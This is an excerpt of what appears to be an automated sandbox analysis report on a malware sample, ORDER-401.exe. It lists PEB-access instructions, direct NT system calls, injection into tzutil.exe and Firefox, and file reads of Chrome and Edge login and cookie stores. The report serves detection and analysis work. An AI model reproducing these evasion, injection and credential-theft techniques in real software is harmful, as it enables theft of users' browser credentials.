                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582750 mov eax, dword ptr fs:[00000030h]4_2_01582750
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C4755 mov eax, dword ptr fs:[00000030h]4_2_015C4755
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157674D mov esi, dword ptr fs:[00000030h]4_2_0157674D
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157674D mov eax, dword ptr fs:[00000030h]4_2_0157674D
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0157674D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01548770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01550770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01540710 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01570710 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0157C700 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0157273C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0157273C mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015BC730 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0157C720 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0154C7C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015C07C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015447FB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015627ED mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015CE7E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015E678E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015407AF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0160866E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0155C640 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01572674 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0157A660 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01582619 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015BE609 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0155260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0155E627 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01576620 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01578620 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0154262C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0157A6C7 mov ebx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0157A6C7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015BE6F2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015C06F1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01544690 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015766B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0157C6A6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015C0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015CC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015E4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01566962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0158096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0158096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01538918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015CC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015BE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015C892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015D892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0154A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015749D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015D69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015729F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0160A9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015CE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015C89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015C89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015529A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015409AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01570854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01544859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01552840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015D6870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015CE872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015CC810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01562835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01562835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015E483A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0157A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0160A8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0156E8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0157C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015CC89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01540887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015EEB50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015E8B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015D6B40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0160AB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0153CB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015BEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01608B28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0156EB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015EEBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01540BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01560BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01548BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0156EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015CCBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01550BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01546A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01550A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015BCA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0157CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015EEA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015CCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01564A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0157CA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0157CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0156EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01540AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01574AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01596ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0157AAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01578A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0154EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01614A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01548AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01596AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01540D59 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01548D59 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015D8D6B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01536D10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01574D1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015F8D10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0155AD00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER-401.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtCreateMutant: Direct from: 0x774635CC
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtWriteVirtualMemory: Direct from: 0x77462E3C
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtMapViewOfSection: Direct from: 0x77462D1C
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtResumeThread: Direct from: 0x774636AC
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtProtectVirtualMemory: Direct from: 0x77462F9C
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtSetInformationProcess: Direct from: 0x77462C5C
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtSetInformationThread: Direct from: 0x774563F9
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtNotifyChangeKey: Direct from: 0x77463C2C
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtProtectVirtualMemory: Direct from: 0x77457B2E
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtAllocateVirtualMemory: Direct from: 0x77462BFC
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtQueryInformationProcess: Direct from: 0x77462C26
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtResumeThread: Direct from: 0x77462FBC
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtReadFile: Direct from: 0x77462ADC
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtQuerySystemInformation: Direct from: 0x77462DFC
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtDelayExecution: Direct from: 0x77462DDC
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtAllocateVirtualMemory: Direct from: 0x77463C9C
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtCreateUserProcess: Direct from: 0x7746371C
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtWriteVirtualMemory: Direct from: 0x7746490C
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtAllocateVirtualMemory: Direct from: 0x774648EC
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtQuerySystemInformation: Direct from: 0x774648CC
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtQueryVolumeInformationFile: Direct from: 0x77462F2C
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtReadVirtualMemory: Direct from: 0x77462E8C
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtCreateKey: Direct from: 0x77462C6C
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtSetInformationThread: Direct from: 0x77462B4C
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtQueryAttributesFile: Direct from: 0x77462E6C
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtDeviceIoControlFile: Direct from: 0x77462AEC
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtOpenSection: Direct from: 0x77462E0C
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtCreateFile: Direct from: 0x77462FEC
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe NtOpenFile: Direct from: 0x77462DCC
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exe | Section loaded: NULL target: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\ORDER-401.exe | Section loaded: NULL target: C:\Windows\SysWOW64\tzutil.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: NULL target: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe protection: read write
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: NULL target: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\tzutil.exe | Thread register set: target process: 4884
                Source: C:\Windows\SysWOW64\tzutil.exe | Thread APC queued: target process: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                Source: C:\Users\user\Desktop\ORDER-401.exe | Process created: C:\Users\user\Desktop\ORDER-401.exe "C:\Users\user\Desktop\ORDER-401.exe"
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe | Process created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
                Source: C:\Windows\SysWOW64\tzutil.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: PcwrDoOfOMD.exe, 00000007.00000002.3257290122.0000000001880000.00000002.00000001.00040000.00000000.sdmp, PcwrDoOfOMD.exe, 00000007.00000000.2019558831.0000000001880000.00000002.00000001.00040000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000000.2167558612.0000000001121000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: PcwrDoOfOMD.exe, 00000007.00000002.3257290122.0000000001880000.00000002.00000001.00040000.00000000.sdmp, PcwrDoOfOMD.exe, 00000007.00000000.2019558831.0000000001880000.00000002.00000001.00040000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000000.2167558612.0000000001121000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: PcwrDoOfOMD.exe, 00000007.00000002.3257290122.0000000001880000.00000002.00000001.00040000.00000000.sdmp, PcwrDoOfOMD.exe, 00000007.00000000.2019558831.0000000001880000.00000002.00000001.00040000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000000.2167558612.0000000001121000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: 0Program Manager
                Source: PcwrDoOfOMD.exe, 00000007.00000002.3257290122.0000000001880000.00000002.00000001.00040000.00000000.sdmp, PcwrDoOfOMD.exe, 00000007.00000000.2019558831.0000000001880000.00000002.00000001.00040000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000000.2167558612.0000000001121000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\ORDER-401.exe | Queries volume information: C:\Users\user\Desktop\ORDER-401.exe VolumeInformation
                Source: C:\Users\user\Desktop\ORDER-401.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\ORDER-401.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\ORDER-401.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\ORDER-401.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\ORDER-401.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\ORDER-401.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 4.2.ORDER-401.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.ORDER-401.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000008.00000002.3257459238.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2097074904.00000000014B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2099965842.0000000003820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3256732308.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\tzutil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

